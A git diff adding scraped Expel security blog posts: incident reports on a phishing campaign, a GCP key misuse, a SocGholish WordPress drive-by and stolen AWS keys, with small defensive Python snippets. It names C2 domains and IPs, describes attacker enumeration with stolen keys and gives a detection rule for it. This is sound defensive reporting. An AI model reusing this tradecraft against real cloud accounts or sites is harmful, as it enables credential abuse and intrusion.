Here the investigative action run was Query Domain, and the analyst looked for any evidence that a user in the enterprise visited the domain in question. In this case, the platform queried an EDR, SIEM and firewall. Then, all the results were returned for the analyst to review. Based on URL logs generated by the firewall (and a lack of SSL) the analyst could confirm that data was transferred to the website for a number of users. Abstracting away the intricacies of each technology and giving our analysts tools, like investigative actions that run across all onboarded security devices, allows them to spend their time focusing on asking and answering investigative questions. Example investigative action in Expel Workbench Quick action is key for minimizing risk. Even with our automation and platform, investigating and writing a report takes a little time. We didn\u2019t like that, so, as we investigate, we take advantage of the transparent platform to skip right to the part where we tell the customer what they need to start remediating. We give our customer security team a heads up that we\u2019ve found something malicious, send them a list of the indicators of compromise (IOCs) we have at that point and recommendations to mitigate as much risk as possible. All of this uses automation and happens in a few clicks. These notifications are delivered via email, Microsoft Teams, Slack, PagerDuty or any combination the customer chooses. Expel Workbench Notification example When we do find a compromise (like a phishing email that tricked a user into submitting creds or running malware), we provide immediate notification with specific remediation actions for the additional IOCs. We know that the customer team is busy, so we provide clear steps on exactly what to do. We also make sure our analysts are available to answer any questions every step of the way. Example Findings Report How this all helps our customers One of the few things analysts, customers and attackers agree on; there\u2019s a big difference between receiving a malicious email and sharing your credentials or computer with an attacker. But identifying emails that are malicious, that no one interacted with, can quickly start to feel like busy work. And no one likes busy work. That doesn\u2019t change the fact that phishing attacks aren\u2019t going away. And attackers are getting smarter. Which is why we think it\u2019s good to know about the malicious emails you\u2019re getting, but the real goal is to quickly identify the malicious emails that lead to a compromise. We saw an opportunity to reconcile the need to have a pair of eyes on every email that is flagged as suspicious and giving our analysts meaningful work (and a chance to continue doing what they do best). \u201cAutomation is helpful, but at some point you need to have trained human eyes on these emails,\u201d \u2014 Expel customer, Lori Temples Vice President of IT Security and Business Continuity We think Expel for Phishing solves this problem. Our goal of creating this offering was to give our customer\u2019s security teams space to focus on other, more interesting tasks while we handle suspicious email submissions." 
+} \ No newline at end of file diff --git a/incident-report-how-a-phishing-campaign-revealed-bec.json b/incident-report-how-a-phishing-campaign-revealed-bec.json new file mode 100644 index 0000000000000000000000000000000000000000..d34a1ee5c3042e024e5a7ef239acbc4407b65de0 --- /dev/null +++ b/incident-report-how-a-phishing-campaign-revealed-bec.json @@ -0,0 +1,6 @@ +{ + "title": "Incident report: how a phishing campaign revealed BEC ...", + "url": "https://expel.com/blog/incident-report-how-a-phishing-campaign-revealed-bec-before-exploitation/", + "date": "Sep 7, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Incident report: how a phishing campaign revealed BEC before exploitation Security operations \u00b7 6 MIN READ \u00b7 BEN SOLOWAY, TYLER WOOD, DAVID OVIATT AND HAROLD HARDING \u00b7 SEP 7, 2022 \u00b7 TAGS: MDR Recently, our SOC witnessed just how quickly attackers can start a phish fry with the spoils of a successful campaign. I don\u2019t think anyone will be too surprised by this, but hackers don\u2019t dilly-dally. When a phishing alert sounded just after midnight EST, it first seemed like a standard fare document-sharing phish. By the time the 89th and final submission was in the bucket, we knew a large-scale campaign had successfully hit a customer. In fact, we caught a suspicious login attempt from one of the compromised accounts shortly after we detected the submission of credentials to a phishing site. Let\u2019s walk through how we triaged the alert. But a campaign is nothing new\u2026 Credential harvesters are one of an attacker\u2019s bread and butter initial access tactics, so no surprise so far. An initial URL redirects to a fake login portal (often Microsoft-themed), and sandbox analysis often tells us where credentials get transmitted. But this particular campaign was really large. It hit users suddenly, and unlike so many others we see, it actually worked. A couple of users got tricked into submitting credentials, and not long after, we saw those credentials used in a login attempt. So why are we talking about a large, run-of-the-mill phishing campaign? Well, this one had some interesting features, including a browser extension, multiple senders, and different initial URLs. It\u2019s a good example of things going right during triage. And finally, it demonstrates the value of automation for enriching and expediting the process. How it went down The first alert was nothing surprising. The sender was from an external account and the body of the email was basically a single image stating that someone had shared a document for review. Our phishing team is a big fan of Ruxie\u2122, one of the robots we use to automate and enrich the details of a case. She\u2019s fantastic at parsing essential information for our analysts. This includes basics like sender addresses, reply-to\u2019s and return-paths, as well as embedded URLs in any given email body, whether in image references, hyperlinks, or text. She even runs API queries to pull back email reputation details and available Clearbit information on the sender organization. We use these pieces of information to orient ourselves to the story of each email, and then take action if needed. In this case, one of our team members reviewed the initial alert in our phishing queue, examined some of Ruxie\u2019s details, and immediately knew something was phishy. The analyst moved the alert into investigation status and started inspecting key features. 
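For a rough idea of the kind of header and URL parsing described above, here is a generic sketch using only Python\u2019s standard library (the file name is illustrative); the actual enrichment our bots perform goes well beyond this.

```python
# Generic sketch of pulling sender addresses, reply-to/return-path headers,
# and embedded URLs out of a reported email. File name is illustrative.
import re
from email import policy
from email.parser import BytesParser

with open("reported_email.eml", "rb") as fh:
    msg = BytesParser(policy=policy.default).parse(fh)

details = {
    "from": msg["From"],
    "reply_to": msg["Reply-To"],
    "return_path": msg["Return-Path"],
    "subject": msg["Subject"],
}

body = msg.get_body(preferencelist=("html", "plain"))
text = body.get_content() if body else ""
details["urls"] = re.findall(r"https?://[^\s\"'<>]+", text)

for key, value in details.items():
    print(f"{key}: {value}")
```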
If we determine malicious intent, we need to know where an attacker is directing victims, so that we can use logs to determine if any users mistakenly took the bait. We\u2019ll usually submit a URL to Ruxie, who integrates with a sandbox analyzer and further enriches the outcome information right from Workbench. Here, the analyst took the embedded URL and followed it to a fake document review page hosted on a Jotform domain. He clicked on the \u201creview document\u201d link and\u2026 that\u2019s where things ended. The fake login portal wouldn\u2019t manifest. There are tons of reasons this might happen \u2013 most often the companies hosting the phishing content get wise to it and shut the page down. But sometimes the attackers are savvy enough to use sandbox detection mechanisms, which make IOCs a little tougher to track down. Our analyst began to fiddle with the URL to see if he could get to the goods. Meanwhile, deep in the virtual SOC, more alerts started hitting the queue. Other analysts determined quickly that these were likely malicious emails. However, as part of our orienting process, they also recognized that the first analyst was working on a submission with the same sender domain, so these were likely related. After some quick discussion, we agreed that a campaign was under way and began adding the new alerts to the investigation. Ruxie quickly picked up on this and began adding the additional submissions, freeing the team up to focus on \u201chuman\u201d analysis tasks. Then another related submission hit the queue. A different sender domain, a slightly different embedded URL, nearly identical body\u2026 clearly the same campaign. At this point, the alerts were coming in pretty quickly, and our initial analyst was seeing several different flavors of the same email. Another analyst jumped in to help track down IOCs and investigate whether there was evidence of compromise, and this latest email was the ticket. As far as we can tell, the bulk of the initial submissions led to pages that had already been taken down by the content-hosting platforms. But this latest one was still live, and we were able to determine exactly where credentials were being sent \u2013 an 18-day-old domain with a Canadian TLD. So we launched some Workbench queries to our customer\u2019s endpoint technology to see if any successful network connections had been made to the malicious URLs and domains. Unfortunately, we started returning some results. This doesn\u2019t always mean credentials are compromised. Often we\u2019ll see the recipient of a phish click a link and make it as far as the fake login portal before they realize the page is bogus and close out. They then submit the phish to us for analysis, and we\u2019ll see those connections, but there\u2019s no evidence of compromise. However, during our sandbox analysis, we were only observing POST-method requests to the new domain, and those were only after credentials were submitted to the harvester. This means any traffic to the new domain observed in the customer environment is assumed to be the submission of credentials, and thus evidence of an active compromise. Submission of credentials to an attacker constitutes an incident requiring immediate action. Because our Workbench queries were returning results, we wanted to verify them by pivoting into the endpoint tech (in this case Defender ATP) before we promoted the investigation and woke the customer up. We submitted queries for the domain to the console, and\u2026 Shazam!
We confirmed that two users had made successful network connections to the malicious domain via Chrome/Edge. An interesting twist on an old method Legitimate services are often employed in phishing attempts. It\u2019s nothing new to see a commonly used service in a malicious email to add a sense of legitimacy. Jotform, a legitimate file-sharing service, was abused during this attack, but the attackers used a trick we hadn\u2019t seen before. Jotform has a feature that adds an extension to the browser, and the purpose of the extension is for quick access to forms that can be managed through Jotform\u2019s premade templates. The attackers leveraged this feature to open the credential harvester in a separate window, which also acted as a bookmark to bring the user directly to the malicious login page. Threshold met. Incident created. Customer notified. At this point, the investigation was promoted to an incident and notifications were sent to the customer\u2019s security team automatically. Our focus shifted to getting remediations to them as quickly as possible, with the most important task being resetting credentials. We quickly blocked the malicious domains, removed the emails, and blocked the senders. We also clarified some of our findings with the customer\u2019s security team. Once the customer acknowledged our findings the incident was assigned over to them. The phishing team concluded its investigation and returned to triaging alerts as normal. Of course, this isn\u2019t quite where the story ended. A few hours later, an Azure AD Identity Protection alert fired for a risky sign-in associated with one of the compromised accounts from the phishing incident. An MDR analyst picked up the alert, and immediately realized that it was suspicious. Our analysts have a lot of options for enrichment and correlation, and a few quick searches revealed that the account was part of the phishing incident. The analyst informed the customer\u2019s security team of the login attempt and quickly received confirmation that credentials for the account had already been reset. However, for tracking purposes, and to allow the customer to test some internal automation, we elevated the login alert to an incident. Some takeaways It\u2019s essential that when we promote a campaign to an incident, the customer is notified immediately so they can respond. In this case, they did take action, and that\u2019s a win, especially since it may have prevented an attacker\u2019s successful login. More importantly it demonstrates redundancy of detection at its best. Our phishing team caught the successful credential harvesting and our MDR team caught the login attempt. If one had failed, the other would have caught it, and our customer would have been notified quickly either way. That\u2019s a win as well. We\u2019ll leave you with a few other thoughts for you to nosh on: If nothing else, this case serves as a reminder of just how quickly attackers can transition from stealing the keys to knocking on the front door. They aren\u2019t waiting around for your weekend to be over or for you to get back from the gym. They\u2019re going to take action quickly. Make sure your colleagues know what to look for, and make it easy for them to report. Educate your organization. 89 submissions to Expel doesn\u2019t reveal the full scope of the campaign. It only tells us how many users saw it, were sharp enough to recognize it as a phish, and then proactively submit it as malicious. 
If the submitters had simply ignored the email, the phishing team obviously couldn\u2019t have recognized the compromise. Quite honestly, 89 submissions for a phishing campaign? That\u2019s not bad. And yet\u2026 With a phishing campaign this size, you\u2019re more likely to see a weak link in the organization compromised. Don\u2019t ignore a large-scale campaign. Give those IOCs a second pass because an adversary only has to succeed once. These campaigns often have slightly different URLs and redirects, but transmit credentials to the same place. Try to understand the end-goal so you can stop them." +} \ No newline at end of file diff --git a/incident-report-spotting-an-attacker-in-gcp.json b/incident-report-spotting-an-attacker-in-gcp.json new file mode 100644 index 0000000000000000000000000000000000000000..5403af49f7438cad6e9b89891db3a38a59a1752f --- /dev/null +++ b/incident-report-spotting-an-attacker-in-gcp.json @@ -0,0 +1,6 @@ +{ + "title": "Incident report: Spotting an attacker in GCP", + "url": "https://expel.com/blog/incident-report-spotting-an-attacker-in-gcp/", + "date": "Jun 9, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Incident report: Spotting an attacker in GCP Security operations \u00b7 3 MIN READ \u00b7 OSCAR DE LA ROSA, GIRISH MUKHI AND DAVID BLANTON \u00b7 JUN 9, 2022 \u00b7 TAGS: Cloud security / MDR TL;DR Common cloud misconfigurations and long-lived credentials were the root cause of all cloud incidents we identified in Q1. This post details a recent Google Cloud Platform (GCP) attack on one of our customers. Key takeaways: follow least privilege principles; regenerate keys periodically; and avoid putting credentials in code, the source tree, or repositories. One of the most common ways we see attackers gain unauthorized access to a customer\u2019s cloud environment is through publicly exposed credentials. In fact, common cloud misconfigurations and long-lived credentials were the root cause of 100% of incidents we identified in the cloud in the first quarter of 2022 (more on this in our new quarterly threat report ). Which makes it no surprise that this is exactly how an attacker gained access to a customer\u2019s Google Cloud Platform (GCP) environment in our most recent cloud incident spotted by our security operations center (SOC). Once the attacker acquired credentials to a GCP service account, they attempted to create a new service account key to maintain access using the Google SDK. While the scope of the incident was small since the GCP methods failed (score one for the good guys!), we still learned a lot. In this post, we\u2019ll walk through how we detected it, our investigative process, and some key takeaways that can help secure your GCP environment. Initial lead and detection methodology Our initial lead was an alert for an API call to the GCP method google.iam.admin.v1.createserviceaccountkey via SDK from an atypical source IP address. When we surfaced the alert to Workbench\u2122, our friendly bot, Ruxie\u2122, enriched the source IP address with geo-location and reputation information. Turned out, the source IP address was likely a TOR exit node with a history of scanning and brute-forcing. Simply put, an API call to the GCP method google.iam.admin.v1.createserviceaccountkey via SDK from this IP address is unusual. Ruxie also provided our SOC analysts with historical context on what other activities this service account performed in GCP within a 7-day timeframe (shown below).
This information enabled our SOC analysts to further confirm that it\u2019s pretty unusual that a service account only performed the GCP methods google.iam.admin.v1.CreateServiceAccountKey and google.iam.admin.v1.EnableServiceAccount using the Google Cloud SDK from a TOR exit node. Based on this data from Ruxie, we believed these service account credentials were likely compromised \u2014 it was time to promote this alert to an incident. We notified the customer, escalated the activity to our SOC emergency on-call team, and began our response. Investigation and response in GCP Once we knew we had an incident on our hands, the first step was to provide the remediation action to disable the service account and reset credentials to our customer to stop the immediate threat. During this process, we answer our investigative questions: How was the GCP service account key compromised? What other GCP methods were called by this GCP service account, or its key, before and after the alerted activity? What other accounts or activities did we see from the TOR IP address in our customer\u2019s environment? To answer these questions, we ran searches across the cloud and domain environment and pulled a timeline of GCP audit logs. Timeline analysis of the GCP audit logs showed that the attacker was unable to successfully create a new service account key, or enable the service account, because the compromised service account didn\u2019t have the required Identity and Access Management (IAM) permissions. After the failed GCP methods, we didn\u2019t observe any more activity from the attacker. Throughout our investigation, we didn\u2019t observe any evidence to explain how the credentials were initially compromised. This led us to believe that the credentials were likely exposed publicly. The customer ended up confirming that they were committed to a public Github repo which allowed us to implement better resilience actions for all of our customers moving forward. Lessons and takeaways Based on our experience, here are some tips and lessons learned from this incident to help you secure your GCP environment: Ensure the principle of least privilege. This hinders attackers from leveraging compromised credentials to further perform post-exploitation in the cloud. For example, the attacker in this incident was unable to perform the GCP methods to create a new service account key because we followed this principle. Regenerate your keys periodically. It\u2019s good security hygiene to rotate keys and in the event that older credentials get compromised by an attacker. Avoid putting any credentials in code, the source tree, or repositories. This helps prevent credentials from being accidentally exposed. Github has a secret scanning service that identifies security keys that were committed, and Google has a security key detection feature that you can enable. Want to learn more about how Expel can help keep your GCP environment secure? Reach out anytime." 
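As a practical companion to the key-rotation tip above, the sketch below lists a service account\u2019s user-managed keys and flags old ones using google-api-python-client. The service account email and age threshold are placeholders, and the snippet assumes Application Default Credentials with IAM read access.

```python
# Hedged sketch: flag user-managed GCP service account keys older than a
# chosen threshold. Service account email and threshold are placeholders.
from datetime import datetime, timezone
from googleapiclient import discovery

SA_EMAIL = "my-sa@my-project.iam.gserviceaccount.com"  # placeholder
MAX_AGE_DAYS = 90                                       # illustrative policy

iam = discovery.build("iam", "v1")
resp = iam.projects().serviceAccounts().keys().list(
    name=f"projects/-/serviceAccounts/{SA_EMAIL}"
).execute()

now = datetime.now(timezone.utc)
for key in resp.get("keys", []):
    if key.get("keyType") != "USER_MANAGED":
        continue  # system-managed keys are rotated by Google
    created = datetime.strptime(key["validAfterTime"], "%Y-%m-%dT%H:%M:%SZ")
    age_days = (now - created.replace(tzinfo=timezone.utc)).days
    if age_days > MAX_AGE_DAYS:
        print(f"rotate me: {key['name']} is {age_days} days old")
```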
+} \ No newline at end of file diff --git a/incident-report-spotting-socgholish-wordpress-injection.json b/incident-report-spotting-socgholish-wordpress-injection.json new file mode 100644 index 0000000000000000000000000000000000000000..4397acddcab5a4b09ebca6abddc1dbdd5942725b --- /dev/null +++ b/incident-report-spotting-socgholish-wordpress-injection.json @@ -0,0 +1,6 @@ +{ + "title": "Incident report: Spotting SocGholish WordPress injection", + "url": "https://expel.com/blog/incident-report-spotting-socgholish-wordpress-injection/", + "date": "Jul 22, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Incident report: Spotting SocGholish WordPress injection Security operations \u00b7 5 MIN READ \u00b7 TYLER FORNES, RYAN GOTT, KYLE PELLETT AND EVAN REICHARD \u00b7 JUL 22, 2021 \u00b7 TAGS: Incident report / Managed detection and response Earlier this week, our SOC stopped a ransomware attack at a large software and staffing company. The attackers compromised the company\u2019s WordPress CMS and used the SocGholish framework to trigger a drive-by download of a Remote Access Tool (RAT) disguised as a Google Chrome update. In total, four hosts downloaded a malicious Zipped JScript file that was configured to deploy a RAT, but we were able to stop the attack before ransomware deployment and help the organization remediate its WordPress CMS. We\u2019ll walk you through what happened, how we caught it, and provide recommendations on how to secure your WordPress CMS. We also hope that this story is a good reminder of the power of asking the right investigative questions . How we spotted our initial lead Around 07:00 UTC ( that\u2019s 3:00 am ET), our SOC received an EDR alert for suspicious Windows Script Host (WSH) activity on one Windows 10 host. The TL;DR is an employee double clicked a Zipped JScript file named \u201cChrome.Update.js\u201d and EDR blocked execution. Here\u2019s what we were able to infer from our initial lead into the activity: This doesn\u2019t look like legitimate Google Chrome update activity Possible \u201cfake update\u201d activity delivered via Zipped JScript file The activity is only on this host, not prevalent, and unlikely to be a false positive The WSH process spawned from Windows Explorer, suggesting the employee double-clicked the JScript file versus part of an exploit-chain Initial lead: suspicious WSH process activity As part of our alert triage process, we did a quick check to make sure we weren\u2019t seeing the WSH activity anywhere else in the environment. We weren\u2019t. And EDR blocked the activity. Case closed? Nope. The quality of your SOC investigations is rooted in the questions you ask. There are two very important questions we needed to answer before calling it \u201ccase closed:\u201d What does the JScript file do? How did the Zipped JScript file get there? To figure out what the JScript file does, we grabbed a copy of the Zipped JScript file and submitted it to our internal sandbox (we use VMRay at Expel). The JScript file did the following at runtime: Contacted command-and-control servers hosted at [.]services[.]accountabilitypartner[.]com (195.189.96.41) and [.]drpease[.]com Opened an HTTP POST request for /pixel.png on TCP port 443 Delivery mechanism consistent with potential SocGholish framework activity Given this info, it\u2019s our opinion that \u201c/pixel.png\u201d is likely a second stage payload. We were unable to acquire a copy of \u201c/pixel.png\u201d for further analysis, but \u2026 Bottom line: it\u2019s bad. 
Now we needed to figure out how the Zipped JScript file got there. This is where the story gets interesting. How we investigated the SocGholish WordPress injection We needed to know how the Zipped JScript file got onto the host computer. It would\u2019ve been easy to assume, \u201cOkay, the Zipped JScript file was likely delivered via phishing and EDR is blocking the activity, so we\u2019ll block the C2 and move on.\u201d \u201c Not so fast, my friend. \u201d \u2013 Lee Corso Using EDR live response features, we acquired a copy of the employee\u2019s Google Chrome browser history as it could potentially contain evidence we needed to determine how the Zipped JScript file got there. The host in question is a Windows machine, so we grabbed a copy of C:Users\\AppDataLocalGoogleChromeUser DataDefaultHistory\u201d and reviewed it using internal tools. You can parse the History .db files using SQLite as well. Sure enough, Google Chrome history recorded that \u201cChrome.Update.js\u201d was downloaded after visiting a URL hosted on the company\u2019s WordPress CMS. The company\u2019s WordPress CMS was likely compromised, resulting in delivery of \u201cfake updates\u201d that deploy the SocGholish RAT. The company\u2019s WordPress CMS is publicly accessible, so anyone visiting the site could potentially be compromised. At this point in our investigation, we declared a critical incident, notified our customer, and in parallel escalated our on-call procedure to bring in additional cavalry to aid in the investigation. Our response and remediation efforts Google Chrome history contained evidence to suggest that the malicious Zipped JScript file was downloaded after visiting a webpage on the company\u2019s WordPress site. We let our customer know that there was evidence to suggest their WordPress site was compromised and to invoke their internal Incident Response plan. We also armed the customer with information about command-and-control servers and advised them to implement blocks. Adding to the excitement, as the late night hours turned into early morning hours on the East Coast, our SOC started to receive additional EDR alerts for deployment of the malicious Zipped JScript on additional Windows 10 hosts. EDR blocked that activity as well, but we needed to get a handle on the WordPress situation quickly. Anytime we\u2019d see a download of the Zipped JScript on a new host, we\u2019d repeat our process to establish how the file got there. In each case the Zipped JScript file was downloaded after visiting the company\u2019s WordPress site. But it turned out that multiple pages on the site were compromised, not just one. This context was super important. For situational awareness, we did a quick check and noticed the company was running an older version of WordPress, 5.5.3. We didn\u2019t have endpoint visibility into the WordPress server as it was hosted by a third party. If we did, we would have wanted to establish when and how the site was compromised. We inferred that the attacker likely exploited a vulnerability in a WordPress plugin or WordPress 5.5.3. We grabbed source code of any page that was recorded as triggering a drive-by-download and got to work. We almost immediately spotted a malicious inline script on every page that triggered a drive-by download: Malicious inline script deployed to multiple pages on the company\u2019s WordPress site We let the customer know about our findings and then turned our attention towards decoding and deobfuscating the script. 
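Before getting into the script itself, one practical note on that browser-history step: Chrome's History file (on Windows it normally lives at C:\Users\<user>\AppData\Local\Google\Chrome\User Data\Default\History) is just a SQLite database, so answering "how did this file get here?" doesn't require special tooling. Here's a minimal sketch against a copied History file; copy it first because Chrome keeps the live one locked, and be aware column names can shift between Chrome versions:

import sqlite3
from datetime import datetime, timedelta

HISTORY_COPY = "History"   # work from a copy of the user's History file, not the live one

# Chrome stores timestamps as microseconds since 1601-01-01 (the WebKit epoch)
def webkit_time(us):
    return datetime(1601, 1, 1) + timedelta(microseconds=us)

conn = sqlite3.connect(HISTORY_COPY)
rows = conn.execute(
    "SELECT start_time, target_path, tab_url, referrer "
    "FROM downloads ORDER BY start_time DESC LIMIT 25"
)
for start_time, target_path, tab_url, referrer in rows:
    print(webkit_time(start_time), target_path)
    print("    downloaded from:", tab_url or referrer)
conn.close()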
Most of the obfuscation consisted of base64 encoded functions and strings. With the help of the Chrome DevTools Console, we stepped through the obfuscated script and eventually landed on the following: Decoded: malicious inline script deployed to multiple WordPress pages From the decoded script above, you\u2019ll see that to trigger the drive-by download, the user must be referred to the site (not referred from the same site) and be running Windows. The Zipped JScript was served from notify.aproposaussies[.]com (179.43.169.30). At the time of writing, only Kaspersky (1/87) has flagged the domain as malicious on VirusTotal. Everything is not fine. We now understand what\u2019s happening. At this point, the customer was already in the process of removing the malicious inline scripts and updating to the most recent version of WordPress. We did one last check of the environment to make sure no additional hosts downloaded the evil Zipped JScript file, checked to make sure that no hosts were talking to known C2 servers, and that no other malicious processes had executed. We asked the right questions and in doing so, figured out what happened. A quick recap: The attackers likely used the \u201c SocGholish \u201d framework to inject a malicious script into multiple pages on the company\u2019s WordPress site by exploiting a vulnerability in a WordPress plugin or WordPress 5.5.3. If an employee navigated to a compromised web page from a device running a Windows OS, an obfuscated inline script triggered a drive-by download of a ZIP file with an embedded Windows JScript file. The malicious JScript file was configured to enable remote access to infected hosts by communicating with command-and-control (C2) servers hosted on legitimate compromised infrastructure. That remote access is then typically used to deploy variants of the WASTEDLOCKER family of ransomware. Lessons learned and tips to prevent similar incidents WordPress security and its ecosystem has improved over the years, but it\u2019s still an attack vector. Keep up to date on patches, but also: Run trusted and well-known WordPress plugins. These tend to have had more scrutiny and more focus on security. Follow a WordPress hardening guide or install a WordPress security plug-in. There are many, so choose one that is right for you. Explore implementing or updating your website Content Security Policy to block malicious scripts. MFA everything and all users. Lock down your dev and staging instances, too (including adding MFA). You need to control the entire chain of the website, not just the final site. If a third party hosts your WordPress site, have all the contact info and recovery info needed in case of an incident. Run an IR tabletop exercise where the initial entry point is your WordPress site. Remember, the quality of your SOC investigations is rooted in the questions you ask. If we didn\u2019t answer, \u201cHow did it get there?\u201d we would have missed a huge finding that the company\u2019s WordPress site was compromised, resulting in drive-by downloads." 
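One more note on the deobfuscation step above: when most of the obfuscation is base64-encoded strings, even a crude helper can save a lot of manual squinting before you step through the script in DevTools. A rough sketch (the file name is hypothetical, and this only surfaces candidate strings; it won't untangle real control flow):

import base64
import re

# Hypothetical local copy of the injected script pulled from a compromised page
blob = open("injected_inline_script.js", encoding="utf-8", errors="replace").read()

# Anything that looks like a long-ish base64 token is worth a peek
for token in sorted(set(re.findall(r"[A-Za-z0-9+/]{24,}={0,2}", blob))):
    try:
        decoded = base64.b64decode(token).decode("utf-8", errors="ignore").strip()
    except Exception:
        continue
    if decoded and decoded.isprintable():
        print(f"{token[:32]}... -> {decoded[:100]}")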
+} \ No newline at end of file diff --git a/incident-report-stolen-aws-access-keys-expel.json b/incident-report-stolen-aws-access-keys-expel.json new file mode 100644 index 0000000000000000000000000000000000000000..57a047d9e28e4ebb5de8cd83f919e610805f25a5 --- /dev/null +++ b/incident-report-stolen-aws-access-keys-expel.json @@ -0,0 +1,6 @@ +{ + "title": "Incident report: stolen AWS access keys - Expel", + "url": "https://expel.com/blog/incident-report-stolen-aws-access-keys/", + "date": "Jan 6, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Incident report: stolen AWS access keys Security operations \u00b7 5 MIN READ \u00b7 MYLES SATTERFIELD, TYLER WOOD, TEAUNA THOMPSON, TYLER COLLINS, IAN COOPER AND NATHAN SORREL \u00b7 JAN 6, 2023 \u00b7 TAGS: MDR What happens when attackers get their hands on a set of Amazon Web Services (AWS) access keys? Well, let\u2019s talk about it. In this post, we\u2019ll share how that scenario led to our security operations center (SOC), threat hunting, and detection engineering teams all working together on an incident. We love it when incidents teach us new things, helping strengthen our service delivery and keep our customer environments safe. We\u2019ll walk through the entire incident step-by-step to highlight not only what caught our attention, but how we capitalized on a situation that our customers don\u2019t often see. Initial lead and detection The initial alert lead indicated authentication with a suspicious user agent. The alert message\u2014Observed Hacking Tool User agent \u2013 Kali Linux\u2014suggested that the user employed the Kali Linux operating system. Weird. A closer look at the user agent in question revealed that it was more specifically aws-cli/1.22.34 Python/3.9.11 Linux/5.15.0-kali3-amd64 botocore/1.27.84. Based on the contextual enrichment below, this AWS user account had not used a Kali Linux user agent within the previous two weeks. But what about the IP address associated with this activity? Ruxie\u2122\u2014our friendly bot responsible for triage\u2014automatically pulled some information for us. We then saw that the IP was allocated to a hosting provider other than AWS, Google, or Microsoft, and also that it wasn\u2019t located in a typical area for this customer. At this point, we were ready to call this an incident and let the customer know we had something interesting on our hands. We issued remediation actions to reset credentials for the user and disable the long-term access key. Once we classified it as an incident, our next step was to see everything that the user, IP, and access key did, so we ran an AWS triage on all of them. Let\u2019s take a closer look at what Ruxie told us the user was doing. Using our AWS user enrichment workflow, we can quickly identify which IPs the user usually performs activity with and any interesting or failed AWS API calls. Here we saw three API calls: two ListUsers and one GetSendQuota (our threat hunting team will tell us why this is important). All were denied and all came from the same access key, but different user agents. Interesting. Using our leads, we scoped additional activity in the compromised environment. As noted earlier, this led to the discovery of additional AWS IAM accounts/access keys. Seven to be exact. We repeated our remediation actions for those accounts/keys. Too long; didn\u2019t read (TL;DR) The attacker gained access to the customer environment through the use of stolen long-term access keys.
Scoping surrounding activity for the AWS account, we saw that the attacker was attempting to use seven different access keys and accounts. How were the AWS keys compromised? During the initial triage, we didn\u2019t find evidence of any exploited services. We turned to open-source intelligence gathering and performed some simple Google searches to see if there were any obvious candidates for exposure. Using patterns observed in the affected IAM account names, we came across a publicly exposed Postman server with access key credentials stored in the project\u2019s variables. Threat hunting While examining what was known about the newly created incident, we noticed an event type we didn\u2019t recognize: GetSendQuota. It\u2019s not one an attacker typically uses, and anomalies are interesting to hunters, so we began running queries and doing some research. What does \u2018GetSendQuota\u2019 do? Who else is running that event type? Does this organization use this event commonly? Did anything else stick out as atypical? Some Googling revealed that GetSendQuota was an Amazon email service feature that \u201cprovides the sending limits for the Amazon SES account.\u201d In scoping the customer\u2019s historical activity, we saw that this event was called very rarely and only by a confined set of users. One of them we could eliminate easily, as it was a service account running automated tasks. The remaining users were interesting, and I noticed several error messages all interacting with the same account. Taking the access_key_id for the initial lead, we looked up what else it did. Most of that user\u2019s activity was Amazon SES-related (around 95%) and we were able to find other events that stuck out as unusual. \u201cUpdateAccountSendingEnabled,\u201d specifically, seemed interesting, as it was called several times (but not excessively, and it seemed to toggle a useful service on or off). Documentation indicated that it \u201cenables or disables email sending across your entire Amazon SES account in the current AWS region.\u201d Isolating this event type in the whole environment confirmed that only six users ever employed this event type. All six overlapped with the group of users from the previous query. This gave us high confidence that all six were compromised. Subsequent queries using the observed source IP addresses for the compromised accounts led us to one more owned account. Interestingly, as we are always researching threat hunt methodologies, we ran a separate hunt against this customer\u2019s data looking for common \u201cgroupings\u201d of attacker events. That hunt didn\u2019t suggest that these accounts were suspicious. It was a useful exercise because it showed that these attackers were consistent in their behavior. But they weren\u2019t doing things the way other bad actors did. For this attack, event prevalence and feature overlap were key to isolating all compromised accounts. This attacker\u2019s focus on email infrastructure was noteworthy and has led us to compile some of these event types into a new \u201cemail event buckets\u201d to hunt on in the future. Detection opportunities for stolen access keys This incident presented a unique scenario to detect against. Hopefully, all defenders in AWS are concerned about attackers stealing an access key\u30fcespecially a long-term access key. This is what keeps us defenders up at night, and is the reason digital watering holes like GitHub have warnings about making resources available to the public. 
The above is quite a standard scenario. However, when attackers gain access to multiple access keys, their behavior may change a little bit, giving blue teams another behavior to key on. When an attacker scores some trust material like an access key, or lands on a box (gains access to a new device) which they\u2019re unfamiliar with, they\u2019re likely to perform some enumeration to figure out what powers they\u2019ve gained. Enumeration of this type can be difficult to detect due to high volume events that are of little concern. Sometimes administrators and infrastructure tools like CloudFormation perform enumeration API calls multiple times a day. In this incident, we noticed the attacker performing the same enumeration activity from the same sources, with multiple access keys. Hunting through our customers\u2019 environments, we found that enumeration of multiple access keys is rare. Specifically, the attacker used the API GetCallerIdentity using multiple access keys and from the same IP. GetCallerIdentity is similar to the bash command whoami and gives the attacker information about where they have landed. Since it rarely happens, is it even worth it to build a detection? Yes, absolutely, because stolen access keys are among the top vectors for initial access into an AWS environment. Key Takeaways Remediation: Deactivate the access key associated with the IAM account Using an abundance of caution, reset the AWS console password associated with the IAM account (recommended) Block the source IP address (recommended) Detections: AWS Access Key Enumeration: multiple recon API calls (GetCallerIdentity) on multiple AWS access keys from the same source IP Threat hunting: Attackers commonly have their own playbook and will keep working it. We can use that to our advantage by looking for similar activity elsewhere (or being executed by different users). We can also use this knowledge to do threat hunting audits long after the original event has been remediated. If you missed some persistence mechanism that was originally established by the attacker, you will be able to see it later if you keep looking for that playbook of events. Common activity is our best friend. Any single environment will have patterns that line up with the daily activity of its admins and users. Attackers won\u2019t know these patterns and will stand out. Knowing your organization\u2019s patterns will help you see attackers. Research and humility are key. Not all attackers are the same. Not all of them will utilize \u201cGetSendQuota.\u201d It\u2019s easy to get complacent and think you know what an attacker might do\u2026only to observe an attack unlike any you had seen before." 
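If you want to experiment with that enumeration detection against your own CloudTrail data, here's a rough sketch using boto3's LookupEvents API. Keep in mind LookupEvents only covers management events from roughly the last 90 days, so a SIEM or Athena query scales better, but the logic is the same:

import json
from collections import defaultdict
from datetime import datetime, timedelta, timezone

import boto3

cloudtrail = boto3.client("cloudtrail")
keys_by_ip = defaultdict(set)

pages = cloudtrail.get_paginator("lookup_events").paginate(
    LookupAttributes=[{"AttributeKey": "EventName", "AttributeValue": "GetCallerIdentity"}],
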